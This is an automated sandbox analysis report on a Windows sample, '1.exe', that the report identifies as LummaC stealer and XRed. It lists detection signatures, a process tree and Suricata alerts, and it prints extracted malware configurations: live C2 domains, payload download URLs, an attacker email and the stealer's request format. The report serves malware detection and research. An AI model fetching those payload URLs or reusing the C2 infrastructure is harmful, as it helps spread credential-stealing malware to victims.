Windows Analysis Report
1.exe

Overview

General Information

Sample name: 1.exe
Analysis ID: 1585287
MD5: d0598443fa9984227105811e5d89b70f
SHA1: 3932d4696f4130658fbf2a16e7f771fc756a63cc
SHA256: fc1595c71b570027b6712c70cafcc075686e14b5702a5a0910f642eb739ac01f
Tags: exe, malware, trojan, user-Joker
Infos:

Detection

LummaC, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

  • System is w10x64
  • 1.exe (PID: 2584 cmdline: "C:\Users\user\Desktop\1.exe" MD5: D0598443FA9984227105811E5D89B70F)
    • ._cache_1.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\._cache_1.exe" MD5: 8F02CCF024090E3BD52574174749C778)
    • Synaptics.exe (PID: 2260 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 065BECDE24188ED65E53BECB09A5A039)
      • WerFault.exe (PID: 5508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 2816 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 4540 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

{"C2 url": ["noisycuttej.shop", "tirepublicerj.shop", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "wholersorie.shop", "abruptyopsn.shop", "twistforcepo.cfd", "rabidcowse.shop"], "Build id": "sadvnqw3nerasdf--"}
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Source | Rule | Description | Author | Strings
1.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |
1.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\RCX9CB3.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\RCX9CB3.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\Synaptics.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
Process Memory Space: 1.exe PID: 2584 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
Process Memory Space: Synaptics.exe PID: 2260 | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
1.0.1.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
1.0.1.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1.exe, ProcessId: 2584, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 2260, TargetFilename: C:\Users\user\AppData\Local\Temp\U1NTS3we.xlsm

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-07T13:18:28.735724+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49744 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:28.773157+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49745 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:29.796536+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49754 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:29.799804+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49757 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:30.904201+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49768 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:30.922727+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49769 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:31.948079+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49780 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:31.951596+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49781 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:33.998523+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49806 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:34.040266+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49807 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:35.057851+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49818 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:35.116762+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49820 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:36.130544+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49828 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:36.170403+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49829 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:37.195532+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49840 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:37.222448+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.11 | 49841 | 142.250.185.110 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-07T13:18:29.318163+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49753 | 69.42.215.252 | 80 | TCP

AV Detection

Source: 1.exe | Avira: detected
Source: http://xred.site50.net/syn/SUpdate.iniH) | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dlp | Avira URL Cloud: Label: malware
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\RCX9CB3.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX9CB3.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\~$cache1 | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\~$cache1 | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: 1.exe | Malware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "tirepublicerj.shop", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "wholersorie.shop", "abruptyopsn.shop", "twistforcepo.cfd", "rabidcowse.shop"], "Build id": "sadvnqw3nerasdf--"}
Source: 1.exe | Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\Synaptics.exe | ReversingLabs: Detection: 86%
Source: 1.exe | Virustotal: Detection: 84%
Source: 1.exe | ReversingLabs: Detection: 86%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 98.5% probability
Source: C:\ProgramData\Synaptics\Synaptics.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCX9CB3.tmp | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\~$cache1 | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\._cache_1.exe | Joe Sandbox ML: detected
Source: 1.exe | Joe Sandbox ML: detected
Source: 1.exe | String decryptor: cloudewahsj.shop
Source: 1.exe | String decryptor: rabidcowse.shop
Source: 1.exe | String decryptor: noisycuttej.shop
Source: 1.exe | String decryptor: tirepublicerj.shop
Source: 1.exe | String decryptor: framekgirus.shop
Source: 1.exe | String decryptor: wholersorie.shop
Source: 1.exe | String decryptor: abruptyopsn.shop
Source: 1.exe | String decryptor: nearycrepso.shop
Source: 1.exe | String decryptor: twistforcepo.cfd
Source: 1.exe | String decryptor: lid=%s&j=%s&ver=4.0
Source: 1.exe | String decryptor: TeslaBrowser/5.5
Source: 1.exe | String decryptor: - Screen Resoluton:
Source: 1.exe | String decryptor: - Physical Installed Memory:
Source: 1.exe | String decryptor: Workgroup: -
Source: 1.exe | String decryptor: sadvnqw3nerasdf--
Source: 1.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: 1.exe, 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: [autorun]
Source: 1.exe, 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: autorun.inf
Source: Synaptics.exe, 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: Synaptics.exe, 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: 1.exe | Binary or memory string: [autorun]
Source: 1.exe | Binary or memory string: autorun.inf
Source: Synaptics.exe.1.dr | Binary or memory string: [autorun]
Source: Synaptics.exe.1.dr | Binary or memory string: autorun.inf
Source: RCX9CB3.tmp.1.dr | Binary or memory string: [autorun]
Source: RCX9CB3.tmp.1.dr | Binary or memory string: autorun.inf
Source: ~$cache1.3.dr | Binary or memory string: [autorun]
Source: ~$cache1.3.dr | Binary or memory string: autorun.inf
Source: C:\Users\user\Desktop\1.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\Desktop\1.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\Desktop\1.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\1.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\1.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\1.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: excel.exeMemory has grown: Private usage: 1MB later: 68MB

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.11:49753 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.11:49745 -> 142.250.185.110:443
                              Source: unknown, DNS query: name: freedns.afraid.org
                              Source: Joe Sandbox View, IP Address: 69.42.215.252
                              Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global traffic, HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                              Source: global traffic, HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
                              Source: global traffic, HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 | User-Agent: MyApp | Host: freedns.afraid.org | Cache-Control: no-cache
                              Source: global traffic, DNS traffic detected: DNS query: docs.google.com
                              Source: global traffic, DNS traffic detected: DNS query: xred.mooo.com
                              Source: global traffic, DNS traffic detected: DNS query: freedns.afraid.org
                              Source: global traffic, DNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | X-GUploader-UploadID: AFiumC4Abtg2ITdHLlXhLkFQzK74zzYUN73qoq7aMNRJ8howqASwprWyEbv_N4ONIZofelFs | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Tue, 07 Jan 2025 12:18:29 GMT | P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Content-Security-Policy: script-src 'report-sample' 'nonce-4jtpZ9yD2N_-NK5Jmf0TPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Cross-Origin-Opener-Policy: same-origin | Content-Length: 1652 | Server: UploadServer | Set-Cookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5; expires=Wed, 09-Jul-2025 12:18:29 GMT; path=/; domain=.google.com; HttpOnly | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7R0MHyI5-6VfOQ8N3LdPxjeM0PTUTztLgxZ1AtA9uGXHGr4M7h4x_ty95ZKhuG4vaxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:29 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-eQiJQVd2AWJm0bvM7bOWVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8; expires=Wed, 09-Jul-2025 12:18:29 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4HvbgaPcPZwvwbSH0JyG-2ToaNzLwNUPjMb_OFik7n-Kqzn5feggn2Ja3Nl0d5NQ9IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce--ScSs8qvgEakHWCB_SQdIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=SZhc7KpC7T7X_R4yEGnNU40kjC7yz3C4_NBUvYTPUWKiYXDIuLwZpAjOF9ocrn4ar2j4bV1J2f0z3dlz4oDnOYNQzR2bwN6GOOAoebYHKlpySm8FUhpfYjo16rCBD_LjcVUQ4yLvGq3_XMw82uBZLD38OBwjWCHX9Fm9FxeZdjzftFSo6zxSzx80; expires=Wed, 09-Jul-2025 12:18:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5GgQF2kF1bSGzLdPsMNxWyfTc0pkL-XydrrNDxFxvD68OmlCsdo-Fc0vAdUY2LyXnsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TDErWUJAIv-7IC3AOr6Uww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78; expires=Wed, 09-Jul-2025 12:18:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7spNP93ghvaesPcubp1zMAP3_n3Co983-BhJ5agm3hiiFzyNyFa9FqrcrXbV3oN-9xContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:32 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-EGWS5ndX-zRBe0YR_jXpKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4uOV_xL7N__W0nzr3nEyPDSdUUsE2KJJHCLBfnFC6E1BpqeU0LGSykG8uV7ZOTM6L1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pMHi68RNn49_7_43Az5uGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4gW5qOzUKXqTTCjeQ9wP6y6xgQKpAZkIM6Tf_6Zi7Nqxir_6iS-NhQks6DFi9jBE9mContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 07 Jan 2025 12:18:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-x90EqjtfPlIiA3yQNuK8rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
